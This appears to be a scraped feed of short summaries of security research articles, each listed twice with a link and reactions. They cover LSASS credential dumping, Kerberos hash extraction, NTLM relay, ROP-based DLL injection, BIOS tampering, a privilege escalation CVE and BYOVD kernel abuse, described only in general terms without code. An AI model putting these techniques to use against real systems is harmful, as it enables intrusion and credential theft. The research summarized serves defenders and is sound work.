Breaking the Shield: Unpacking a VMProtected Windows Kernel Driver
Original text by eversinc33
The article explains a practical workflow for unpacking a Windows kernel driver protected with VMProtect and preparing it for reverse engineering. The author analyzes an anti-cheat driver (KSophon_x64.sys) protected by VMProtect v2–3 and demonstrates how to bypass its protection mechanisms to restore a usable binary for analysis. The main challenge comes…
https://core-jmp.org/2026/03/breaking-the-shield-unpacking-a-vmprotected-windows-kernel-driver/
Original text by eversinc33
The article explains a practical workflow for unpacking a Windows kernel driver protected with VMProtect and preparing it for reverse engineering. The author analyzes an anti-cheat driver (KSophon_x64.sys) protected by VMProtect v2–3 and demonstrates how to bypass its protection mechanisms to restore a usable binary for analysis. The main challenge comes…
https://core-jmp.org/2026/03/breaking-the-shield-unpacking-a-vmprotected-windows-kernel-driver/
🔥15
Ghost in LSASS: Inside the KslKatz Credential Dumping Framework
Original text by S1lkys
The GitHub project KslKatz introduces a credential-dumping tool designed for red-team operations and security research on Windows systems. The project combines techniques from multiple tools—most notably KslDump and GhostKatz—to extract credentials from the lsass.exe process, which stores authentication secrets used by Windows. Instead of relying on common approaches such as direct…
https://core-jmp.org/2026/03/ghost-in-lsass-inside-the-kslkatz-credential-dumping-framework/
Original text by S1lkys
The GitHub project KslKatz introduces a credential-dumping tool designed for red-team operations and security research on Windows systems. The project combines techniques from multiple tools—most notably KslDump and GhostKatz—to extract credentials from the lsass.exe process, which stores authentication secrets used by Windows. Instead of relying on common approaches such as direct…
https://core-jmp.org/2026/03/ghost-in-lsass-inside-the-kslkatz-credential-dumping-framework/
👍10
From PCAP to Passwords: Automating Kerberos Roast Extraction
Original text by jalvarezz13
Krb5RoastParser is an open-source Python tool created to simplify the extraction of Kerberos authentication hashes from captured network traffic. Instead of manually analyzing packets in Wireshark, the tool processes .pcap files and automatically identifies Kerberos authentication messages such as AS-REQ, AS-REP, and TGS-REP. Using tshark, the script parses these packets and…
https://core-jmp.org/2026/03/from-pcap-to-passwords-automating-kerberos-roast-extraction/
Original text by jalvarezz13
Krb5RoastParser is an open-source Python tool created to simplify the extraction of Kerberos authentication hashes from captured network traffic. Instead of manually analyzing packets in Wireshark, the tool processes .pcap files and automatically identifies Kerberos authentication messages such as AS-REQ, AS-REP, and TGS-REP. Using tshark, the script parses these packets and…
https://core-jmp.org/2026/03/from-pcap-to-passwords-automating-kerberos-roast-extraction/
🔥10😱5
Breaking the Flat Network: How Tiering Models Protect Active Directory
Original text by Aurelien Chalot
The article explains why many enterprise networks remain vulnerable due to flat network architectures, where systems and administrative privileges are poorly segmented. Drawing on years of internal penetration-testing experience, the author shows that even organizations equipped with modern security tools can still be compromised if attackers gain an initial foothold.…
https://core-jmp.org/2026/03/breaking-the-flat-network-how-tiering-models-protect-active-directory/
Original text by Aurelien Chalot
The article explains why many enterprise networks remain vulnerable due to flat network architectures, where systems and administrative privileges are poorly segmented. Drawing on years of internal penetration-testing experience, the author shows that even organizations equipped with modern security tools can still be compromised if attackers gain an initial foothold.…
https://core-jmp.org/2026/03/breaking-the-flat-network-how-tiering-models-protect-active-directory/
🔥10👍1
Out-of-Cancel: A New Linux Kernel Race Condition Bug Class
Original text by v4bel
The article introduces a newly identified Linux kernel vulnerability pattern called “Out-of-Cancel”, which arises from incorrect assumptions about the behavior of workqueue cancellation APIs. The author analyzes how functions such as cancel_work_sync() or cancel_delayed_work_sync() are often used in kernel teardown paths to stop asynchronous work before freeing an object. However, these…
https://core-jmp.org/2026/03/out-of-cancel-a-new-linux-kernel-race-condition-bug-class/
Original text by v4bel
The article introduces a newly identified Linux kernel vulnerability pattern called “Out-of-Cancel”, which arises from incorrect assumptions about the behavior of workqueue cancellation APIs. The author analyzes how functions such as cancel_work_sync() or cancel_delayed_work_sync() are often used in kernel teardown paths to stop asynchronous work before freeing an object. However, these…
https://core-jmp.org/2026/03/out-of-cancel-a-new-linux-kernel-race-condition-bug-class/
👍8
When DNS Forwarding Meets Recursion: Understanding Conditional Forwarders in Windows
Original text by https://it-pro-berlin.de
The article analyzes how conditional forwarders and recursion interact in Windows DNS servers, clarifying a common misconception among administrators. The author investigates a claim that disabling recursion globally on a Windows DNS server would also disable conditional forwarders. Through experiments and configuration analysis, the article shows that conditional forwarders can actually…
https://core-jmp.org/2026/03/when-dns-forwarding-meets-recursion-understanding-conditional-forwarders-in-windows/
Original text by https://it-pro-berlin.de
The article analyzes how conditional forwarders and recursion interact in Windows DNS servers, clarifying a common misconception among administrators. The author investigates a claim that disabling recursion globally on a Windows DNS server would also disable conditional forwarders. Through experiments and configuration analysis, the article shows that conditional forwarders can actually…
https://core-jmp.org/2026/03/when-dns-forwarding-meets-recursion-understanding-conditional-forwarders-in-windows/
👍6
Relaying Trust: Exploiting NTLM Authentication to Compromise Active Directory
Original text by SecCoreGmbH
The article explains how NTLM relay attacks can be used to gain unauthorized access in Active Directory environments when certain security protections are not enforced. The author demonstrates a practical attack scenario where an attacker captures NTLM authentication from a Windows system and relays it to another service such as LDAP…
https://core-jmp.org/2026/03/relaying-trust-exploiting-ntlm-authentication-to-compromise-active-directory/
Original text by SecCoreGmbH
The article explains how NTLM relay attacks can be used to gain unauthorized access in Active Directory environments when certain security protections are not enforced. The author demonstrates a practical attack scenario where an attacker captures NTLM authentication from a Windows system and relays it to another service such as LDAP…
https://core-jmp.org/2026/03/relaying-trust-exploiting-ntlm-authentication-to-compromise-active-directory/
👍9
Stealth Injection with ROP: Thread Hijacking Without Executable Memory
Original text by Umarex
The article introduces a technique called T(ROP)H (Thread Hijacking with ROP), which enables DLL injection into a remote Windows process without allocating executable memory. Traditional thread hijacking typically allocates memory with execute permissions and places shellcode there before redirecting a thread’s instruction pointer to the payload. However, allocating executable memory is…
https://core-jmp.org/2026/03/stealth-injection-with-rop-thread-hijacking-without-executable-memory/
Original text by Umarex
The article introduces a technique called T(ROP)H (Thread Hijacking with ROP), which enables DLL injection into a remote Windows process without allocating executable memory. Traditional thread hijacking typically allocates memory with execute permissions and places shellcode there before redirecting a thread’s instruction pointer to the payload. However, allocating executable memory is…
https://core-jmp.org/2026/03/stealth-injection-with-rop-thread-hijacking-without-executable-memory/
👍7🔥4
Breaking the Firmware Trust: Disabling Security in a Locked BIOS
Original text by Craig S. Blackie.
The article demonstrates how firmware-level modifications can undermine system security even when the BIOS/UEFI interface is locked with a password. The research focuses on modifying a UEFI firmware image directly at the flash level, allowing an attacker with physical access to disable security features while leaving the BIOS interface…
https://core-jmp.org/2026/03/breaking-the-firmware-trust-disabling-security-in-a-locked-bios/
Original text by Craig S. Blackie.
The article demonstrates how firmware-level modifications can undermine system security even when the BIOS/UEFI interface is locked with a password. The research focuses on modifying a UEFI firmware image directly at the flash level, allowing an attacker with physical access to disable security features while leaving the BIOS interface…
https://core-jmp.org/2026/03/breaking-the-firmware-trust-disabling-security-in-a-locked-bios/
🔥7👍1
Backup to SYSTEM: Exploiting the IDrive Client Privilege Escalation Flaw
Original text by Ddos
The article describes a local privilege escalation vulnerability in the IDrive Cloud Backup Client for Windows, tracked as CVE-2026-1995. The flaw arises from insecure permission settings in files used by the backup client service. The service process id_service.exe runs with SYSTEM privileges and periodically reads configuration files located in C:ProgramDataIDrive. These…
https://core-jmp.org/2026/03/backup-to-system-exploiting-the-idrive-client-privilege-escalation-flaw/
Original text by Ddos
The article describes a local privilege escalation vulnerability in the IDrive Cloud Backup Client for Windows, tracked as CVE-2026-1995. The flaw arises from insecure permission settings in files used by the backup client service. The service process id_service.exe runs with SYSTEM privileges and periodically reads configuration files located in C:ProgramDataIDrive. These…
https://core-jmp.org/2026/03/backup-to-system-exploiting-the-idrive-client-privilege-escalation-flaw/
👍5
Inside WMI: Tracing Windows Management from Consumers to COM Providers
Original text by Jonathan Johnson
The two-part article explores the internal architecture of Windows Management Instrumentation (WMI) and explains how management queries and actions are executed inside Windows. WMI is Microsoft’s implementation of WBEM (Web-Based Enterprise Management) and provides a standardized way for applications and administrators to query system information or manage resources such as…
https://core-jmp.org/2026/03/inside-wmi-tracing-windows-management-from-consumers-to-com-providers/
Original text by Jonathan Johnson
The two-part article explores the internal architecture of Windows Management Instrumentation (WMI) and explains how management queries and actions are executed inside Windows. WMI is Microsoft’s implementation of WBEM (Web-Based Enterprise Management) and provides a standardized way for applications and administrators to query system information or manage resources such as…
https://core-jmp.org/2026/03/inside-wmi-tracing-windows-management-from-consumers-to-com-providers/
👍3
Hidden Bugs in Plain Sight: Hunting Vulnerabilities Inside Shared Libraries
Original text by Grzegorz Wypych (h0rac)
The article explains how security researchers can discover vulnerabilities that hide not in the main application binary but inside the shared libraries it depends on. The author presents the concept behind the ByteRay vulnerability hunting engine, which focuses on tracking how input data flows across program boundaries—from the main…
https://core-jmp.org/2026/03/hidden-bugs-in-plain-sight-hunting-vulnerabilities-inside-shared-libraries/
Original text by Grzegorz Wypych (h0rac)
The article explains how security researchers can discover vulnerabilities that hide not in the main application binary but inside the shared libraries it depends on. The author presents the concept behind the ByteRay vulnerability hunting engine, which focuses on tracking how input data flows across program boundaries—from the main…
https://core-jmp.org/2026/03/hidden-bugs-in-plain-sight-hunting-vulnerabilities-inside-shared-libraries/
👍2
Bypassing Code Integrity Using BYOVD for Kernel R/W Primitives
Original text by S12 – 0x12Dark Development
The article demonstrates how attackers can bypass Windows Kernel Code Integrity protections by abusing the BYOVD (Bring Your Own Vulnerable Driver) technique to obtain powerful kernel read/write primitives. Instead of loading a malicious unsigned driver, the attacker loads a legitimate but vulnerable signed driver that contains exploitable IOCTL…
https://core-jmp.org/2026/03/bypassing-code-integrity-using-byovd-for-kernel-r-w-primitives/
Original text by S12 – 0x12Dark Development
The article demonstrates how attackers can bypass Windows Kernel Code Integrity protections by abusing the BYOVD (Bring Your Own Vulnerable Driver) technique to obtain powerful kernel read/write primitives. Instead of loading a malicious unsigned driver, the attacker loads a legitimate but vulnerable signed driver that contains exploitable IOCTL…
https://core-jmp.org/2026/03/bypassing-code-integrity-using-byovd-for-kernel-r-w-primitives/
😱3👍1